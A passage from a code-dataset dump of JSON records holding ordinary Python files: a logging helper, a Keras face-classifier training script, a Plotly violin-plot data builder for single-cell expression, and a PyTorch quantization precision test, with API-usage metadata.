"line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg.SIAMSE", "line_number": 92, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg", "line_number": 92, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path", "line_number": 104, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 107, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 113, "usage_type": "call"}, {"api_name": 
"pickle.HIGHEST_PROTOCOL", "line_number": 113, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 125, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 125, "usage_type": "name"}, {"api_name": "lib.networks.netconfig.cfg.SIAMSE", "line_number": 147, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg", "line_number": 147, "usage_type": "name"}, {"api_name": "lib.networks.netconfig.cfg.SIAMSE", "line_number": 156, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg", "line_number": 156, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 162, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.uint16", "line_number": 168, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 169, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 170, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 171, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 172, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 172, "usage_type": "attribute"}, {"api_name": "scipy.sparse.sparse.csr_matrix", "line_number": 174, "usage_type": "call"}, {"api_name": "scipy.sparse.sparse", "line_number": 174, "usage_type": "attribute"}, {"api_name": "scipy.sparse", "line_number": 174, "usage_type": "name"}, {"api_name": "numpy.random.permutation", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 192, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 218, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path", "line_number": 235, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 240, "usage_type": "call"}, {"api_name": "os.path", "line_number": 240, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 241, "usage_type": "call"}, {"api_name": "os.path", "line_number": 241, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 243, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 253, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 253, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 263, "usage_type": "call"}, {"api_name": "os.path", "line_number": 263, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 264, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 264, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 285, "usage_type": "call"}, {"api_name": "numpy.uint16", "line_number": 285, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 293, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 293, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 293, "usage_type": "name"}, {"api_name": 
"numpy.asarray", "line_number": 298, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 303, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 303, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 313, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 313, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 314, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 314, "usage_type": "name"}, {"api_name": "lib.networks.netconfig.cfg.SIAMSE", "line_number": 314, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg", "line_number": 314, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 316, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 325, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 325, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 325, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 326, "usage_type": "call"}, {"api_name": "os.path", "line_number": 326, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 332, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 334, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg.SIAMSE", "line_number": 335, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg", "line_number": 335, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 338, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 338, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 349, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 349, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 350, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 350, "usage_type": "name"}, {"api_name": "lib.networks.netconfig.cfg.SIAMSE", "line_number": 350, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg", "line_number": 350, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 352, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 361, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 361, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 361, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 362, "usage_type": "call"}, {"api_name": "os.path", "line_number": 362, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 363, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 364, "usage_type": "call"}, {"api_name": "os.path", "line_number": 364, "usage_type": "attribute"}]} +{"seq_id": "19821833789", "text": "#!/usr/bin/env python3\n#\n# (c) 2019 Yoichi Tanibayashi\n#\n\"\"\"\nMyLogger.py\n\nUsage:\n\n--\nfrom MyLogger import get_logger\n\nclass A:\n def __init__(self, a, debug=False)\n self.debug = debug\n self.logger = get_logger(__class__.__name__, self.debug)\n self.logger.debug('a=%s', a)\n--\n\n\"\"\"\n__author__ = 'Yoichi Tanibayashi'\n__date__ = '2019'\n\nfrom logging import getLogger, StreamHandler, Formatter, DEBUG, INFO, WARN\n\n\nclass MyLogger:\n def __init__(self, name=''):\n fmt_hdr = '%(asctime)s %(levelname)s '\n fmt_loc = '%(filename)s.%(name)s.%(funcName)s:%(lineno)d> '\n self.handler_fmt = Formatter(fmt_hdr + fmt_loc + 
'%(message)s',\n datefmt='%H:%M:%S')\n\n self.console_handler = StreamHandler()\n self.console_handler.setLevel(DEBUG)\n self.console_handler.setFormatter(self.handler_fmt)\n\n self.logger = getLogger(name)\n self.logger.setLevel(INFO)\n self.logger.addHandler(self.console_handler)\n self.logger.propagate = False\n\n def get_logger(self, name, debug):\n logger = self.logger.getChild(name)\n if debug:\n logger.setLevel(DEBUG)\n else:\n logger.setLevel(INFO)\n return logger\n\n\nmyLogger = MyLogger()\n\n\ndef get_logger(name, debug):\n return myLogger.get_logger(name, debug)\n", "repo_name": "ytani01/OledServer", "sub_path": "MyLogger.py", "file_name": "MyLogger.py", "file_ext": "py", "file_size_in_byte": 1352, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.Formatter", "line_number": 31, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 35, "usage_type": "argument"}, {"api_name": "logging.getLogger", "line_number": 38, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 39, "usage_type": "argument"}, {"api_name": "logging.DEBUG", "line_number": 46, "usage_type": "argument"}, {"api_name": "logging.INFO", "line_number": 48, "usage_type": "argument"}]} +{"seq_id": "6789644767", "text": "import models\nimport load_lfw as load\nimport sys\nimport os\nimport keras\nimport sys\n\nimport keras.backend as K\n\n# Important global data\nclasses = ['Other', 'Halle Berry']\nK.set_learning_phase(0)\n\n# Grab training/testing data\nnorm_freq = load.normalize_frequencies_function(num_classes=2)\nX_train, y_train = load.get_dataset('/home/jspringer/Workspace/hb/dataset/train', preprocessing=[norm_freq, load.shuffle])\nX_test, y_test = load.get_dataset('/home/jspringer/Workspace/hb/dataset/test')\ny_train = keras.utils.to_categorical(y_train, num_classes=2)\ny_test = keras.utils.to_categorical(y_test, num_classes=2)\n\ndatagen = keras.preprocessing.image.ImageDataGenerator(\n rotation_range=10.0,\n width_shift_range=0.25,\n height_shift_range=0.25,\n channel_shift_range=0.2,\n shear_range=5.0,\n zoom_range=0.1,\n horizontal_flip=True)\ndatagen.fit(X_train)\n\nadam_params = { 'lr': 1e-5, 'decay': 1e-7 }\n\nmodelset = [\n# models.HB_ResNet50(adam_params=adam_params),\n# models.HB_InceptionV3(adam_params=adam_params),\n# models.HB_VGG16(adam_params=adam_params),\n# models.HB_MobileNetV2(adam_params=adam_params),\n models.HB_DenseNet121(adam_params=adam_params)\n]\n\nfor model in modelset:\n print('Pre-training {}'.format(type(model).__name__))\n model.train(X_train, y_train, \n generator=datagen, \n validation_data=(X_test, y_test),\n epochs=5,\n shuffle=True,\n save_on_best=False,\n pretraining_stage=True)\n\n print('Training {}'.format(type(model).__name__))\n model.train(X_train, y_train,\n generator=datagen,\n validation_data=(X_test, y_test),\n shuffle=True,\n save_on_best=True,\n epochs=75,\n pretraining_stage=False)\n print()\n", "repo_name": "jakespringer/LCAHalleBerry", "sub_path": "analysis/deep-models/halleberry/train-all.py", "file_name": "train-all.py", "file_ext": "py", "file_size_in_byte": 1840, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "keras.backend.set_learning_phase", "line_number": 12, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 12, "usage_type": "name"}, {"api_name": 
"load_lfw.normalize_frequencies_function", "line_number": 15, "usage_type": "call"}, {"api_name": "load_lfw.get_dataset", "line_number": 16, "usage_type": "call"}, {"api_name": "load_lfw.shuffle", "line_number": 16, "usage_type": "attribute"}, {"api_name": "load_lfw.get_dataset", "line_number": 17, "usage_type": "call"}, {"api_name": "keras.utils.to_categorical", "line_number": 18, "usage_type": "call"}, {"api_name": "keras.utils", "line_number": 18, "usage_type": "attribute"}, {"api_name": "keras.utils.to_categorical", "line_number": 19, "usage_type": "call"}, {"api_name": "keras.utils", "line_number": 19, "usage_type": "attribute"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 21, "usage_type": "call"}, {"api_name": "keras.preprocessing", "line_number": 21, "usage_type": "attribute"}, {"api_name": "models.HB_DenseNet121", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "70505990885", "text": "#!/bin/python\n\nimport sys\nimport os\nimport json\nimport csv\nimport itertools\nimport loompy\nimport numpy as np\n\nimport helper\n\nfileName = \"normalized_counts.loom\"\n\ncolour_counter = 0\n\ndef add_barcode(plotly_obj, label, barcode, expression_values):\n\t\"\"\" add the barcode+expression to an exisiting group or make a new one in the plotly object \"\"\"\n\tfor group in plotly_obj:\n\t\tif group['name'] == label:\n\t\t\tgroup['x'].append(label)\n\t\t\tgroup['y'].append(expression_values[barcode])\n\t\t\treturn\n\n\t# label not seen yet, create new group\n\tplotly_obj.append(new_violin_group(label, expression_values[barcode]))\n\treturn\n\ndef label_with_groups(plotly_obj, expression_values, group, labels_tsv):\n\t# label each barcode with its chosen group\n\tlabel_idx = labels_tsv[0].index(str(group))\n\tgroup_type = labels_tsv[1][label_idx]\n\tall_barcodes = {key: True for key in expression_values.keys()}\n\tif group_type == 'group':\n\t\tfor row in labels_tsv[2:]:\n\t\t\tbarcode = str(row[0])\n\t\t\tif all_barcodes.pop(barcode, None):\n\t\t\t\t# only add barcodes that exist in expressions dictionary\n\t\t\t\tlabel = str(row[label_idx])\n\t\t\t\tadd_barcode(plotly_obj, label, barcode, expression_values)\n\t\t# now add the remaining barcodes without a label\n\t\tfor barcode in all_barcodes.keys():\n\t\t\tlabel = 'unlabeled'\n\t\t\tadd_barcode(plotly_obj, label, barcode, expression_values)\n\telif group_type == 'numeric':\n\t\t# can't do this for violins\n\t\thelper.return_error(group + \" is numeric data, not viewable in violin plots\")\n\telse:\n\t\thelper.return_error(group + \" does not have a valid data type (must be 'group')\")\n\n\treturn plotly_obj\n\ndef sort_barcodes(opacities, group, runID):\n\t\"\"\" given the opacities for the barcodes, sorts them into the specified groups and returns a plotly object \"\"\"\n\tplotly_obj = []\n\t\n\tpath = \"/usr/src/app/results/{runID}/SEURAT/frontend_groups/groups.tsv\".format(runID=runID)\n\tif not os.path.isfile(path):\n\t\t# try command-line path\n\t\tpath = \"../../results/{runID}/SEURAT/frontend_groups/groups.tsv\".format(runID=runID)\n\t\tif not os.path.isfile(path):\n\t\t\thelper.return_error(\"group label file not found (\"+path+\")\")\n\t\n\twith open(path) as group_definitions:\n\t\treader = csv.reader(group_definitions, delimiter=\"\\t\")\n\t\tavailable_groups = next(reader)[1:]\n\t\ttry:\n\t\t\tlabel_idx = available_groups.index(str(group)) + 1\n\t\texcept ValueError as e:\n\t\t\thelper.return_error(group + \" is not an available group\")\n\t\tfor row in reader:\n\t\t\tbarcode = 
str(row[0])\n\t\t\tlabel = str(row[label_idx])\n\t\t\tadd_barcode(plotly_obj, label, barcode, opacities)\n\n\treturn plotly_obj\n\ndef get_expression(feature, runID):\n\t\"\"\" parses the normalized count matrix to get an expression value for each barcode \"\"\"\n\tpath = \"/usr/src/app/results/{runID}/SEURAT/frontend_normalized/{fileName}\".format(runID=runID, fileName=fileName)\n\tif not os.path.isfile(path):\n\t\t# try command-line path\n\t\tpath = \"../../results/{runID}/SEURAT/frontend_normalized/{fileName}\".format(runID=runID, fileName=fileName)\n\t\tif not os.path.isfile(path):\n\t\t\thelper.return_error(\"normalized count matrix not found (\"+path+\")\")\n\n\twith loompy.connect(path) as ds:\n\t\tbarcodes = ds.ca.CellID\n\t\tfeatures = ds.ra.Gene\n\t\tfeature_idx = next((i for i in range(len(features)) if features[i] == feature), -1)\n\t\tif feature_idx >= 0:\n\t\t\tfeature_exp = [float(i) for i in ds[feature_idx, :]]\n\t\t\treturn dict(zip(barcodes, feature_exp))\n\t\telse:\n\t\t\thelper.return_error(\"Feature Not Found\")\n\n\twith open(path) as norm_counts:\n\t\treader = csv.reader(norm_counts, delimiter=\"\\t\")\n\t\tbarcodes = next(reader)\n\t\tfor row in reader:\n\t\t\tif str(row[0]) == str(feature):\n\t\t\t\tfeature_exp = [float(x) for x in row[1:]]\n\t\t\t\t# dict where barcodes are keys, opacities are values\n\t\t\t\treturn dict(zip(barcodes, feature_exp)) \n\n\thelper.return_error(\"Feature Not Found\")\n\n\n\ndef new_violin_group(label, y_coord):\n\t\"\"\" creates a new violin group for the plot \"\"\"\n\tglobal colour_counter\n\tviolin_group = {\n\t\t\"name\": label,\n\t\t\"type\": \"violin\",\n\t\t\"spanmode\": \"hard\",\n\t\t\"fillcolor\": \"\",\n\t\t\"line\": {\"color\": helper.COLOURS[colour_counter%len(helper.COLOURS)] },\n\t\t\"points\": \"jitter\",\n\t\t\"jitter\": 0.85,\n\t\t\"width\": 0.75,\n\t\t\"meanline\": {\"visible\": \"true\"},\n\t\t\"x\": [label],\n\t\t\"y\": [y_coord]\n\t}\n\tcolour_counter += 1\n\treturn violin_group\n\ndef categorize_barcodes(group, expression_values, runID, projectID):\n\t\"\"\" for every group, make a new plotly object and put the barcodes into it \"\"\"\n\tgroups_path = \"/usr/src/app/results/{runID}/SEURAT/frontend_groups/groups.tsv\".format(runID=runID)\n\tmetadata_path = \"/usr/src/app/minio/upload/project-{projectID}/metadata.tsv\".format(projectID=projectID) # optional, user-defined\n\tif not os.path.isfile(groups_path):\n\t\t# try command-line path\n\t\tgroups_path = \"../../results/{runID}/SEURAT/frontend_groups/groups.tsv\".format(runID=runID)\n\t\tmetadata_path = \"../../minio/upload/project-{projectID}/metadata.tsv\".format(projectID=projectID) # optional\n\t\tif not os.path.isfile(groups_path):\n\t\t\thelper.return_error(\"group label file not found (\"+groups_path+\")\")\n\n\t# store the file(s) in 2d lists\n\tgroups_tsv = [line.rstrip('\\n').split('\\t') for line in open(groups_path)]\n\tmetadata_tsv = [line.rstrip('\\n').split('\\t') for line in open(metadata_path)] if os.path.isfile(metadata_path) else []\n\n\tplotly_obj = []\n\tif group in groups_tsv[0]:\n\t\t# groups tsv definition supersedes metadata\n\t\tlabel_with_groups(plotly_obj, expression_values, group, groups_tsv)\n\telif metadata_tsv and group in metadata_tsv[0]:\n\t\t# it's defined in the metadata\n\t\tlabel_with_groups(plotly_obj, expression_values, group, metadata_tsv)\n\telse:\n\t\thelper.return_error(group + \" is not an available group in groups.tsv or metadata.tsv\")\n\n\treturn plotly_obj\n\n\ndef calculate_bandwidths(plotly_obj):\n\t\"\"\" all expression values 
now recorded, calculate bandwidths and display violins with null bandwidths as boxplots \"\"\"\n\tfor violin_group in plotly_obj:\n\t\ty_values = violin_group['y']\n\t\t#print(y_values.count(0.0)/float(len(y_values))*100)\n\t\tif sum(y_values) == 0.0:\n\t\t\tviolin_group['type'] = 'box'\n\t\telse:\n\t\t\t# replace 0s with 0.1 for kernel density estimate (doesn't perform well on sparse data) \n\t\t\tmod_values = [0.1 if val == 0.0 else val for val in y_values]\n\t\t\t# calculate Silverman's Rule of Thumb\tfor bandwidth\n\t\t\tiqr = np.subtract(*np.percentile(mod_values, [75,25]))\n\t\t\tstd = np.std(mod_values)\n\t\t\tviolin_group['bandwidth'] = 0.9 * min(std, iqr/1.34) * (len(mod_values)**(-1/5.0))\n\n\treturn\n\ndef get_violin_data(group, feature, runID, projectID):\n\t\"\"\" given a grouping for the cells and a feature of interest, returns the plotly violin object \"\"\"\t\n\texpression_values = get_expression(feature, runID)\n\tplotly_obj = categorize_barcodes(group, expression_values, runID, projectID)\n\tcalculate_bandwidths(plotly_obj)\n\treturn plotly_obj\n\ndef main():\n\ttry:\n\t\tparams = json.loads(sys.argv[1]) # parse json inputs\n\t\tgroup, feature, runID, projectID = params['group'], params['feature'], params['runID'], params['projectID']\n\texcept Exception as e:\n\t\thelper.return_error(\"unable to read arguments: \"+str(e))\n\n\tresult = get_violin_data(group, feature, runID, projectID)\n\thelper.sort_traces(result)\n\tprint(json.dumps(result))\n\tsys.stdout.flush()\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "pughlab/crescent-frontend", "sub_path": "express/python/violin.py", "file_name": "violin.py", "file_ext": "py", "file_size_in_byte": 7106, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "52", "api": [{"api_name": "helper.return_error", "line_number": 47, "usage_type": "call"}, {"api_name": "helper.return_error", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "helper.return_error", "line_number": 62, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 65, "usage_type": "call"}, {"api_name": "helper.return_error", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "helper.return_error", "line_number": 85, "usage_type": "call"}, {"api_name": "loompy.connect", "line_number": 87, "usage_type": "call"}, {"api_name": "helper.return_error", "line_number": 95, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 98, "usage_type": "call"}, {"api_name": "helper.return_error", "line_number": 106, "usage_type": "call"}, {"api_name": "helper.COLOURS", "line_number": 118, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 133, "usage_type": "call"}, {"api_name": "os.path", "line_number": 133, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path", "line_number": 137, "usage_type": "attribute"}, {"api_name": 
"helper.return_error", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path", "line_number": 142, "usage_type": "attribute"}, {"api_name": "helper.return_error", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.subtract", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 169, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 183, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 183, "usage_type": "attribute"}, {"api_name": "helper.return_error", "line_number": 186, "usage_type": "call"}, {"api_name": "helper.sort_traces", "line_number": 189, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 190, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 191, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 191, "usage_type": "attribute"}]} +{"seq_id": "74532321124", "text": " \nimport torch\nfrom torch.ao.quantization._pt2e.quantizer import (\n ComposableQuantizer,\n DerivedQuantizationSpec,\n EmbeddingQuantizer,\n FixedQParamsQuantizationSpec,\n OperatorConfig,\n QNNPackQuantizer,\n QuantizationAnnotation,\n QuantizationSpec,\n Quantizer,\n SharedQuantizationSpec,\n)\nimport copy\nimport torch._dynamo as torchdynamo\nfrom torch.ao.quantization._quantize_pt2e import (\n _convert_to_reference_decomposed_fx,\n convert_pt2e,\n prepare_pt2e_quantizer,\n prepare_qat_pt2e_quantizer,\n)\n\ntorch._dynamo.config.verbose = True\ntorch._inductor.config.trace.enabled = True\ntorch._inductor.config.trace.debug_log = True\ntorch._inductor.config.debug = True\ntorch._inductor.config.verbose_progress = True\nfrom torch._inductor.compile_fx import compile_fx\n\nimport numpy as np\nimport random\nimport torch.utils._pytree as pytree\nimport torch.fx._pytree as fx_pytree\nfrom torch.utils._pytree import (\n tree_flatten,\n tree_map,\n tree_unflatten,\n TreeSpec,\n LeafSpec,\n pytree_to_str,\n str_to_pytree,\n)\n\nlocal_seed = 2023\ntorch.manual_seed(local_seed) # Set PyTorch seed\nnp.random.seed(seed=local_seed) # Set Numpy seed\nrandom.seed(local_seed) # Set the Python seed\n\ndef test():\n class M(torch.nn.Module):\n def __init__(self,):\n super().__init__()\n\n def forward(self, x, y):\n # arg0, arg1, = fx_pytree.tree_flatten_spec(([x, y], {}), self._in_spec)\n arg0, arg1, = x, y\n quantize_per_tensor_default = torch.ops.quantized_decomposed.quantize_per_tensor(arg0, 0.02003643848001957, 130, 0, 255, torch.uint8); arg0 = None\n quantize_per_tensor_default_1 = torch.ops.quantized_decomposed.quantize_per_tensor(arg1, 0.021639926359057426, 138, 0, 255, torch.uint8); arg1 = None\n _to_copy_default = torch.ops.aten._to_copy.default(quantize_per_tensor_default, dtype = torch.int32); quantize_per_tensor_default = None\n _to_copy_default_1 = torch.ops.aten._to_copy.default(quantize_per_tensor_default_1, dtype = torch.int32); quantize_per_tensor_default_1 = None\n div_tensor = torch.ops.aten.div.Tensor(0.02003643848001957, 0.03313786908984184)\n sub_tensor = torch.ops.aten.sub.Tensor(_to_copy_default, 130); _to_copy_default = None\n mul_tensor = torch.ops.aten.mul.Tensor(div_tensor, sub_tensor); div_tensor = sub_tensor = None\n _to_copy_default_2 = torch.ops.aten._to_copy.default(mul_tensor, dtype = torch.int32); mul_tensor = None\n div_tensor_1 = torch.ops.aten.div.Tensor(0.021639926359057426, 0.03313786908984184)\n sub_tensor_1 = 
torch.ops.aten.sub.Tensor(_to_copy_default_1, 138); _to_copy_default_1 = None\n mul_tensor_1 = torch.ops.aten.mul.Tensor(div_tensor_1, sub_tensor_1); div_tensor_1 = sub_tensor_1 = None\n _to_copy_default_3 = torch.ops.aten._to_copy.default(mul_tensor_1, dtype = torch.int32); mul_tensor_1 = None\n add_tensor_1 = torch.ops.aten.add.Tensor(_to_copy_default_2, _to_copy_default_3); _to_copy_default_2 = _to_copy_default_3 = None\n add_tensor_2 = torch.ops.aten.add.Tensor(add_tensor_1, 133); add_tensor_1 = None\n clamp_default = torch.ops.aten.clamp.default(add_tensor_2, 0, 255); add_tensor_2 = None\n _to_copy_default_4 = torch.ops.aten._to_copy.default(clamp_default, dtype = torch.uint8); clamp_default = None\n dequantize_per_tensor_default_2 = torch.ops.quantized_decomposed.dequantize_per_tensor(_to_copy_default_4, 0.03313786908984184, 133, 0, 255, torch.uint8); _to_copy_default_4 = None\n # return pytree.tree_unflatten([dequantize_per_tensor_default_2], self._out_spec)\n return (dequantize_per_tensor_default_2, )\n\n m = M()\n example_inputs = (torch.randn(1, 3, 32), torch.randn(1, 3, 32),)\n\n\n # Calculate reference result\n pt2_quant_output = m(*example_inputs)\n\n optimized_model = compile_fx(m, example_inputs)\n print(\"first run\", flush=True)\n optimized_model(*example_inputs)\n print(\"second run\", flush=True)\n res = optimized_model(*example_inputs)\n\n print(\"res is: {}\".format(res), flush=True)\n print(\"pt2_quant_output is: {}\".format(pt2_quant_output), flush=True)\n print(torch.allclose(res[0], pt2_quant_output[0], rtol=0.01, atol=0.01), flush=True)\n \n\ndef test_torch_to_int():\n input = torch.tensor([1.27, 1.68, -1.27, -1.68], dtype=torch.float)\n print(\"input is: {}\".format(input), flush=True)\n input_int = input.to(dtype=torch.int32)\n print(\"input_int is: {}\".format(input_int), flush=True)\n\n\nif __name__ == \"__main__\":\n test()\n # test_torch_to_int()\n", "repo_name": "leslie-fang-intel/torch_script", "sub_path": "inductor/int8/test_precision_expression/test_debug_numerial_difference.py", "file_name": "test_debug_numerial_difference.py", "file_ext": "py", "file_size_in_byte": 4675, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch._dynamo", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch._inductor", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch._inductor", "line_number": 26, "usage_type": "attribute"}, {"api_name": "torch._inductor", "line_number": 27, "usage_type": "attribute"}, {"api_name": "torch._inductor", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 47, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.ops.quantized_decomposed.quantize_per_tensor", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 58, "usage_type": "attribute"}, {"api_name": "torch.uint8", "line_number": 58, "usage_type": "attribute"}, {"api_name": "torch.ops.quantized_decomposed.quantize_per_tensor", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 59, "usage_type": "attribute"}, {"api_name": "torch.uint8", "line_number": 59, "usage_type": "attribute"}, {"api_name": 
"torch.ops.aten._to_copy.default", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 60, "usage_type": "attribute"}, {"api_name": "torch.int32", "line_number": 60, "usage_type": "attribute"}, {"api_name": "torch.ops.aten._to_copy.default", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 61, "usage_type": "attribute"}, {"api_name": "torch.int32", "line_number": 61, "usage_type": "attribute"}, {"api_name": "torch.ops.aten.div.Tensor", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 62, "usage_type": "attribute"}, {"api_name": "torch.ops.aten.sub.Tensor", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 63, "usage_type": "attribute"}, {"api_name": "torch.ops.aten.mul.Tensor", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 64, "usage_type": "attribute"}, {"api_name": "torch.ops.aten._to_copy.default", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.int32", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.ops.aten.div.Tensor", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 66, "usage_type": "attribute"}, {"api_name": "torch.ops.aten.sub.Tensor", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 67, "usage_type": "attribute"}, {"api_name": "torch.ops.aten.mul.Tensor", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 68, "usage_type": "attribute"}, {"api_name": "torch.ops.aten._to_copy.default", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.int32", "line_number": 69, 